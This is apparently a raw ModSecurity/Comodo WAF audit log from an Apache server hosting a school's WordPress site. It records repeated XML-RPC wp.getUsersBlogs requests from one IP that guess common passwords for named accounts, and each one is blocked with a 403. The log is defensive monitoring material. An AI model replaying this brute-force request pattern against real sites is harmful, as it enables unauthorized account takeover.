[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (62+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871891136821 3923 (- - -) Stopwatch2: 1749871891136821 3923; combined=2988, p1=329, p2=2503, p3=0, p4=0, p5=91, sr=74, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e438753-Z-- --cee40930-A-- [14/Jun/2025:10:32:31 +0700] aEztT0MWfhkd5Y0sFtrwqQAAAJQ 103.236.140.4 47440 103.236.140.4 8181 --cee40930-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cee40930-C-- wp.getUsersBlogs miswan home123 --cee40930-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cee40930-E-- --cee40930-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871951088655 5383 (- - -) Stopwatch2: 1749871951088655 5383; combined=3755, p1=466, p2=3118, p3=0, p4=0, p5=101, sr=97, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cee40930-Z-- --1b1c8f6b-A-- [14/Jun/2025:10:33:34 +0700] aEztjkMWfhkd5Y0sFtrwygAAAIY 103.236.140.4 47532 103.236.140.4 8181 --1b1c8f6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1b1c8f6b-C-- wp.getUsersBlogs miswan iloveyou --1b1c8f6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b1c8f6b-E-- --1b1c8f6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872014094822 5050 (- - -) Stopwatch2: 1749872014094822 5050; combined=3653, p1=462, p2=3017, p3=0, p4=0, p5=102, sr=88, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b1c8f6b-Z-- --92dffb06-A-- [14/Jun/2025:10:34:01 +0700] aEztqUMWfhkd5Y0sFtrw3QAAAIE 103.236.140.4 47586 103.236.140.4 8181 --92dffb06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --92dffb06-C-- wp.getUsersBlogs miswan 1234%^&* --92dffb06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92dffb06-E-- --92dffb06-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872041635973 4381 (- - -) Stopwatch2: 1749872041635973 4381; combined=3400, p1=377, p2=2855, p3=0, p4=0, p5=100, sr=80, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92dffb06-Z-- --4efaee7b-A-- [14/Jun/2025:10:34:39 +0700] aEztz0MWfhkd5Y0sFtrxCwAAAIA 103.236.140.4 47686 103.236.140.4 8181 --4efaee7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4efaee7b-C-- wp.getUsersBlogs miswan ashley --4efaee7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4efaee7b-E-- --4efaee7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872079813367 5469 (- - -) Stopwatch2: 1749872079813367 5469; combined=3842, p1=466, p2=3203, p3=0, p4=0, p5=102, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4efaee7b-Z-- --d74c7c39-A-- [14/Jun/2025:10:35:40 +0700] aEzuDF3g_boun6Rx5jLUKgAAAMs 103.236.140.4 47798 103.236.140.4 8181 --d74c7c39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d74c7c39-C-- wp.getUsersBlogs miswan babygirl --d74c7c39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d74c7c39-E-- --d74c7c39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872140869083 5217 (- - -) Stopwatch2: 1749872140869083 5217; combined=3722, p1=428, p2=3099, p3=0, p4=0, p5=112, sr=87, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d74c7c39-Z-- --0ceb4147-A-- [14/Jun/2025:10:36:40 +0700] aEzuSGmwZ6YUkjOdtI7OOgAAABY 103.236.140.4 47972 103.236.140.4 8181 --0ceb4147-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0ceb4147-C-- wp.getUsersBlogs miswan love123 --0ceb4147-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ceb4147-E-- --0ceb4147-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872200860532 4195 (- - -) Stopwatch2: 1749872200860532 4195; combined=3208, p1=343, p2=2698, p3=0, p4=0, p5=97, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ceb4147-Z-- --75e4d770-A-- [14/Jun/2025:10:37:46 +0700] aEzuikMWfhkd5Y0sFtrxTAAAAJc 103.236.140.4 48084 103.236.140.4 8181 --75e4d770-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --75e4d770-C-- wp.getUsersBlogs miswan jesus1 --75e4d770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75e4d770-E-- --75e4d770-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872266906323 5720 (- - -) Stopwatch2: 1749872266906323 5720; combined=3993, p1=460, p2=3340, p3=0, p4=0, p5=111, sr=94, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75e4d770-Z-- --8776a21b-A-- [14/Jun/2025:10:38:46 +0700] aEzuxkMWfhkd5Y0sFtrxWwAAAI8 103.236.140.4 48164 103.236.140.4 8181 --8776a21b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8776a21b-C-- wp.getUsersBlogs miswan london --8776a21b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8776a21b-E-- --8776a21b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872326166791 4759 (- - -) Stopwatch2: 1749872326166791 4759; combined=3491, p1=388, p2=2934, p3=0, p4=0, p5=99, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8776a21b-Z-- --5a29ee38-A-- [14/Jun/2025:10:39:47 +0700] aEzvA0MWfhkd5Y0sFtrxdAAAAJQ 103.236.140.4 48230 103.236.140.4 8181 --5a29ee38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5a29ee38-C-- wp.getUsersBlogs miswan celtic --5a29ee38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a29ee38-E-- --5a29ee38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872387108978 4952 (- - -) Stopwatch2: 1749872387108978 4952; combined=3564, p1=444, p2=2952, p3=0, p4=0, p5=99, sr=97, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a29ee38-Z-- --074e6f7a-A-- [14/Jun/2025:10:40:47 +0700] aEzvP2mwZ6YUkjOdtI7OWQAAAAo 103.236.140.4 48336 103.236.140.4 8181 --074e6f7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --074e6f7a-C-- wp.getUsersBlogs miswan bethany --074e6f7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --074e6f7a-E-- --074e6f7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872447089273 5359 (- - -) Stopwatch2: 1749872447089273 5359; combined=3799, p1=436, p2=3063, p3=0, p4=0, p5=164, sr=94, sw=136, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --074e6f7a-Z-- --a3f05a17-A-- [14/Jun/2025:10:41:47 +0700] aEzve2mwZ6YUkjOdtI7OjgAAAA8 103.236.140.4 48466 103.236.140.4 8181 --a3f05a17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a3f05a17-C-- wp.getUsersBlogs kresno 1234567890 --a3f05a17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3f05a17-E-- --a3f05a17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872507255521 4380 (- - -) Stopwatch2: 1749872507255521 4380; combined=3284, p1=341, p2=2751, p3=0, p4=0, p5=109, sr=78, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3f05a17-Z-- --6dde0440-A-- [14/Jun/2025:10:42:48 +0700] aEzvuF3g_boun6Rx5jLUYwAAANg 103.236.140.4 48542 103.236.140.4 8181 --6dde0440-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6dde0440-C-- wp.getUsersBlogs kresno kresno@2015 --6dde0440-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dde0440-E-- --6dde0440-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872568166870 4217 (- - -) Stopwatch2: 1749872568166870 4217; combined=3229, p1=374, p2=2674, p3=0, p4=0, p5=104, sr=82, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dde0440-Z-- --ca1e2e0c-A-- [14/Jun/2025:10:44:00 +0700] aEzwAGIDXuKmWNi2UBS6AgAAAEE 103.236.140.4 48566 103.236.140.4 8181 --ca1e2e0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ca1e2e0c-C-- wp.getUsersBlogs kresno asdf1234 --ca1e2e0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca1e2e0c-E-- --ca1e2e0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (7+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872640344233 5534 (- - -) Stopwatch2: 1749872640344233 5534; combined=3869, p1=461, p2=3201, p3=0, p4=0, p5=121, sr=93, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca1e2e0c-Z-- --f3d5b548-A-- [14/Jun/2025:10:45:01 +0700] aEzwPV3g_boun6Rx5jLUgQAAAMc 103.236.140.4 48680 103.236.140.4 8181 --f3d5b548-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f3d5b548-C-- wp.getUsersBlogs kresno Marketing2011_ --f3d5b548-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3d5b548-E-- --f3d5b548-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872701333511 5747 (- - -) Stopwatch2: 1749872701333511 5747; combined=3910, p1=505, p2=3220, p3=0, p4=0, p5=109, sr=91, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3d5b548-Z-- --191b714f-A-- [14/Jun/2025:10:46:01 +0700] aEzweUMWfhkd5Y0sFtrx6AAAAIk 103.236.140.4 48852 103.236.140.4 8181 --191b714f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --191b714f-C-- wp.getUsersBlogs kresno kresno@1987 --191b714f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --191b714f-E-- --191b714f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872761229771 4138 (- - -) Stopwatch2: 1749872761229771 4138; combined=3177, p1=342, p2=2671, p3=0, p4=0, p5=95, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
